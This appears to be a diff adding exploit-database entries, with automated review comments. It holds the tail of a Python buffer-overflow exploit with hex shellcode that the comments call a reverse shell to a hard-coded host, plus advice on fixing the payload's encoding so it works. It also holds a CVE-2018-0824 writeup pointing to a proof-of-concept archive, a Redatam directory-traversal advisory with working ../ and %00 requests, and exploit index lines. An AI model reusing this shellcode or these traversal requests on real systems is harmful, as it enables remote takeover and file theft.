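+"\x74\x73\x6b\x43\x6b\x31\x71\x31\x49\x53\x6a\x43\x61"
+"\x4b\x4f\x79\x70\x63\x6f\x73\x6f\x70\x5a\x4c\x4b\x64"
+"\x52\x5a\x4b\x6c\x4d\x43\x6d\x52\x48\x30\x33\x67\x42"
+"\x37\x70\x73\x30\x35\x38\x34\x37\x53\x43\x76\x52\x33"
+"\x6f\x53\x64\x63\x58\x30\x4c\x33\x47\x76\x46\x44\x47"
+"\x6b\x4f\x38\x55\x6d\x68\x4a\x30\x37\x71\x47\x70\x47"
+"\x70\x55\x79\x69\x54\x76\x34\x46\x30\x35\x38\x45\x79"
+"\x6d\x50\x70\x6b\x57\x70\x79\x6f\x4a\x75\x56\x30\x56"
+"\x30\x30\x50\x46\x30\x73\x70\x30\x50\x43\x70\x72\x70"
+"\x62\x48\x4b\x5a\x44\x4f\x59\x4f\x6d\x30\x49\x6f\x7a"
+"\x75\x7a\x37\x51\x7a\x55\x55\x53\x58\x76\x6a\x6e\x48"
+"\x4c\x4e\x6e\x61\x73\x58\x44\x42\x67\x70\x47\x71\x4f"
+"\x4b\x4d\x59\x4d\x36\x53\x5a\x34\x50\x70\x56\x76\x37"
+"\x31\x78\x6e\x79\x49\x35\x44\x34\x53\x51\x49\x6f\x68"
+"\x55\x6d\x55\x6f\x30\x50\x74\x36\x6c\x69\x6f\x50\x4e"
+"\x56\x68\x52\x55\x6a\x4c\x73\x58\x6a\x50\x58\x35\x6c"
+"\x62\x46\x36\x59\x6f\x48\x55\x32\x48\x43\x53\x30\x6d"
+"\x63\x54\x77\x70\x6f\x79\x78\x63\x56\x37\x32\x77\x46"
+"\x37\x50\x31\x59\x66\x32\x4a\x46\x72\x53\x69\x62\x76"
+"\x79\x72\x59\x6d\x52\x46\x59\x57\x63\x74\x51\x34\x37"
+"\x4c\x76\x61\x66\x61\x6c\x4d\x61\x54\x44\x64\x42\x30"
+"\x6b\x76\x73\x30\x42\x64\x63\x64\x52\x70\x31\x46\x51"
+"\x46\x50\x56\x42\x66\x30\x56\x62\x6e\x71\x46\x76\x36"
+"\x36\x33\x71\x46\x42\x48\x74\x39\x7a\x6c\x55\x6f\x4f"
+"\x76\x59\x6f\x6b\x65\x4b\x39\x59\x70\x70\x4e\x66\x36"
+"\x30\x46\x59\x6f\x64\x70\x31\x78\x67\x78\x6c\x47\x67"
+"\x6d\x35\x30\x49\x6f\x78\x55\x4d\x6b\x58\x70\x6d\x65"
+"\x6f\x52\x36\x36\x73\x58\x6c\x66\x7a\x35\x4d\x6d\x6d"
+"\x4d\x59\x6f\x59\x45\x75\x6c\x53\x36\x31\x6c\x47\x7a"
+"\x6d\x50\x49\x6b\x79\x70\x70\x75\x36\x65\x6f\x4b\x77"
+"\x37\x62\x33\x61\x62\x70\x6f\x71\x7a\x45\x50\x61\x43"
+"\x6b\x4f\x69\x45\x41\x41"
+)
+exploit = Exploit(shellcode)
+exploit.run()
+if __name__ == "__main__":
+main()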
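Review bot: `__write` opens poc.txt in text mode and writes a str built from `\xNN` escapes; under Python 3 the values above 0x7f (`\xeb`, `\x90`, `\x91` in the SEH chain and `\xda`, `\xcd` at the head of the shellcode) are code points that the locale codec re-encodes or rejects, corrupting the payload, so the writer should be `with open("poc.txt", "wb") as f: f.write(self._payload)` with pattern, jmp_short, pop2ret and the shellcode turned into bytes literals. The `#!/usr/bin/env python` line sits after six header comments and is therefore inert; move it to line 1 or drop it. The embedded shellcode is a reverse shell to the hard-coded `LHOST=10.168.142.129 LPORT=443`, and `pop2ret` is an absolute address in WMA8Connect.dll, so a reader must regenerate the shellcode and re-verify the gadget for their build; a comment above `pop2ret` saying so would save a debugging session. Both the class and main() are fully contained in this hunk.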


@ -0,0 +1,11 @@
Writeup: https://codewhitesec.blogspot.com/2018/06/cve-2018-0624.html
In May 2018 Microsoft patched an interesting vulnerability (CVE-2018-0824) which was reported by Nicolas Joly of Microsoft's MSRC:
A remote code execution vulnerability exists in "Microsoft COM for Windows" when it fails to properly handle serialized objects. An attacker who successfully exploited the vulnerability could use a specially crafted file or script to perform actions. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file that is designed to exploit the vulnerability. However, an attacker would have no way to force the user to visit the website. Instead, an attacker would have to convince the user to click a link, typically by way of an enticement in an email or Instant Messenger message, and then convince the user to open the specially crafted file. The security update addresses the vulnerability by correcting how "Microsoft COM for Windows" handles serialized objects.
The keywords "COM" and "serialized" pretty much jumped into my face when the advisory came out. Since I had already spent several months of research time on Microsoft COM last year I decided to look into it. Although the vulnerability can result in remote code execution, I'm only interested in the privilege escalation aspects.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44906.zip
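Review bot: The writeup link on the first line ends in `cve-2018-0624` while the text names CVE-2018-0824; one of the two is a typo and the link should be re-checked so readers do not chase the wrong identifier. The proof of concept is an opaque zip hosted elsewhere, so this entry documents nothing about what it contains or how to run it; a short comment listing the archive's contents, the Windows build it was tested on, and the expected outcome (which account or integrity level the escalation yields) would make the entry reviewable. The quoted advisory describes remote code execution while the title and last paragraph scope this to local privilege escalation; a sentence reconciling the two would help.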


@ -0,0 +1,90 @@
# Exploit Title: Redatam Web Server < 7 - Directory Traversal
# Google Dork: inurl: /redbin/rpwebutilities.exe/
# Date: 2018-06-18
# Exploit Author: Berk Dusunur
# Vendor Homepage: http://redatam.org/redatam/en/index.html
# Software Link: https://www.cepal.org/en/topics/redatam/download-redatam
# Version: before V6
# Tested on: Pardus Windows AppServ
# CVE : N/A
# Proof of Concept
# Redatam web server windows server running LFN parameter affected by directory traversal
# Making a wrong request causes directory leak
# Request
GET /redbin/rpwebutilities.exe/text?LFN=blablabla%00.htm&TYPE=TMP HTTP/1.1
Host: 192.168.1.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
# Response
HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Jun 2018 10:04:44 GMT
Server: Apache/2.4.23 (Win32) PHP/5.6.25
Content:
Content-Length: 416
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<heading/>
<body>
<h1>R+SP WebUtilities Exception</h1>
<p>Error Number [401]</p>
<p><b>Error Message</b></p>
<p>File not found in folder [C:\wamp\apps\redatam\redbin\] - [blablabla]
Script directory /wamp/apps/redatam/redbin/
# Request 2
GET
/redbin/rpwebutilities.exe/text?LFN=../../../../../../../../../../../../../../../../wamp/apps/redatam/redbin/prt/webservermain.inl%00.htm&TYPE=TMP
HTTP/1.1
Host: 192.168.1.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
# Response 2
HTTP/1.1 200 OK
Date: Mon, 18 Jun 2018 10:11:44 GMT
Server: Apache/2.4.23 (Win32) PHP/5.6.25
Title:
../../../../../../../../../../../../../../../../wamp/apps/redatam/redbin/prt/webservermain.inl
Content:
Content-Length: 2319
Connection: close
Content-Type: text/html; charset=utf-8
[STRUCTURE]
USERCONTROL=YES
GROUPALIGN=LEFT
SERVERTIMEOUT=1800
HTMLPATH=RpSite\
PORTALTITLE=CELADE/CEPAL, Nações Unidas
PORTALSUBTITLE=Procesamiento En-Línea com REDATAM
//PORTALCENTERIMAGE=/redatam/images/LogoRedatam7_520x390.png
//PORTALBACKGROUNDHEADERIMAGE=
//PORTALBACKGROUNDINDEXIMAGE=
//PORTALBACKGROUNDOUTPUTIMAGE=
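Review bot: The header line `# Version: before V6` contradicts the title `Redatam Web Server < 7 - Directory Traversal`, so a reader cannot tell whether V6 itself is affected; the version line should match the title or state only the build that was actually tested. The first response is also a finding in its own right: the 500 error page discloses the absolute install path `C:\wamp\apps\redatam\redbin\`, which the advisory should list separately as an information disclosure rather than leave implicit in the transcript. For defenders, note that the second response echoes the raw LFN value back in a `Title:` header, so these requests are easy to spot in access logs or to block with a rule that rejects `../` and `%00` sequences in the LFN parameter; a one-line mitigation section saying so would make the entry more useful. The `# Tested on: Pardus Windows AppServ` line is ambiguous since the response shows Apache Win32 while Pardus is a Linux distribution; presumably it names the client and server respectively, which should be stated.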


@ -9775,6 +9775,7 @@ id,file,description,date,author,type,platform,port
44840,exploits/windows_x86/local/44840.py,"10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86,
44841,exploits/windows_x86/local/44841.py,"10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86,
44842,exploits/linux/local/44842.txt,"WebKitGTK+ < 2.21.3 - Crash (PoC)",2018-06-05,"Dhiraj Mishra",local,linux,
44899,exploits/linux/local/44899.txt,"Nikto 2.1.6 - CSV Injection",2018-06-18,"Adam Greenhill",local,linux,
41705,exploits/windows_x86/local/41705.cpp,"Fortinet FortiClient 5.2.3 (Windows 10 x86) - Local Privilege Escalation",2017-03-11,sickness,local,windows_x86,
44852,exploits/android/local/44852.txt,"Ftp Server 1.32 - Credential Disclosure",2018-06-07,ManhNho,local,android,
44858,exploits/windows/local/44858.txt,"TrendMicro OfficeScan XG 11.0 - Change Prevention Bypass",2018-06-08,hyp3rlinx,local,windows,
@ -9782,6 +9783,10 @@ id,file,description,date,author,type,platform,port
44889,exploits/linux/local/44889.rb,"glibc - 'realpath()' Privilege Escalation (Metasploit)",2018-06-13,Metasploit,local,linux,
44892,exploits/windows/local/44892.txt,"RSLinx Classic and FactoryTalk Linx Gateway - Privilege Escalation",2018-06-13,LiquidWorm,local,windows,
44896,exploits/windows/local/44896.vb,"Soroush IM Desktop app 0.15 - Authentication Bypass",2018-06-15,VortexNeoX64,local,windows,
44900,exploits/windows/local/44900.txt,"Pale Moon Browser < 27.9.3 - Use After Free (PoC)",2018-06-18,"Berk Cem Göksel",local,windows,
44903,exploits/windows/local/44903.py,"Audiograbber 1.83 - Local Buffer Overflow (SEH)",2018-06-18,"Dennis 'dhn' Herrmann",local,windows,
44904,exploits/linux/local/44904.py,"Redis-cli < 5.0 - Buffer Overflow (PoC)",2018-06-18,"Fakhri Zulkifli",local,linux,
44906,exploits/windows/local/44906.txt,"Microsoft COM for Windows - Privilege Escalation",2018-06-18,"Code White",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39527,8 +39532,6 @@ id,file,description,date,author,type,platform,port
44837,exploits/php/webapps/44837.py,"Pagekit < 1.0.13 - Cross-Site Scripting Code Generator",2018-06-05,DEEPIN2,webapps,php,
44839,exploits/hardware/webapps/44839.md,"Brother HL Series Printers 1.15 - Cross-Site Scripting",2018-06-04,"Huy Kha",webapps,hardware,
44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux,
44844,exploits/hardware/webapps/44844.txt,"Canon LBP6650/LBP3370/LBP3460/LBP7750C - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware,
44845,exploits/hardware/webapps/44845.txt,"Canon MF210/MF220 - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware,
44851,exploits/php/webapps/44851.txt,"WampServer 3.0.6 - Cross-Site Request Forgery",2018-06-07,L0RD,webapps,php,
44853,exploits/php/webapps/44853.txt,"WordPress Form Maker Plugin 1.12.24 - SQL Injection",2018-06-07,defensecode,webapps,php,
44854,exploits/php/webapps/44854.txt,"WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection",2018-06-07,defensecode,webapps,php,
@ -39550,10 +39553,11 @@ id,file,description,date,author,type,platform,port
44882,exploits/php/webapps/44882.txt,"Canon PrintMe EFI - Cross-Site Scripting",2018-06-12,"Huy Kha",webapps,php,
44883,exploits/php/webapps/44883.txt,"WordPress Google Map Plugin < 4.0.4 - SQL Injection",2018-06-12,defensecode,webapps,php,
44884,exploits/php/webapps/44884.txt,"WordPress Ultimate Form Builder Lite Plugin < 1.3.7 - SQL Injection",2018-06-12,defensecode,webapps,php,
44885,exploits/hardware/webapps/44885.txt,"Canon LBP7110Cw - Authentication Bypass",2018-06-12,"Huy Kha",webapps,hardware,
44886,exploits/hardware/webapps/44886.txt,"Canon LBP6030w - Authentication Bypass",2018-06-12,"Huy Kha",webapps,hardware,
44887,exploits/php/webapps/44887.html,"MACCMS 10 - Cross-Site Request Forgery (Add User)",2018-06-13,bay0net,webapps,php,
44891,exploits/php/webapps/44891.txt,"Redaxo CMS Mediapool Addon < 5.5.1 - Arbitrary File Upload",2018-06-13,h0n1gsp3cht,webapps,php,
44893,exploits/php/webapps/44893.php,"Joomla Component Ek rishta 2.10 - SQL Injection",2018-06-14,"Guilherme Assmann",webapps,php,
44895,exploits/php/webapps/44895.txt,"OEcms 3.1 - Cross-Site Scripting",2018-06-15,Renzi,webapps,php,
44897,exploits/php/webapps/44897.txt,"Dimofinf CMS 3.0.0 - Cross-Site Scripting",2018-06-15,Renzi,webapps,php,
44901,exploits/php/webapps/44901.html,"Joomla! Component jomres 9.11.2 - Cross-Site Request Forgery",2018-06-18,L0RD,webapps,php,
44902,exploits/linux/webapps/44902.txt,"RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery",2018-06-18,"Dolev Farhi",webapps,linux,
44905,exploits/windows/webapps/44905.txt,"Redatam Web Server < 7 - Directory Traversal",2018-06-18,"Berk Dusunur",webapps,windows,
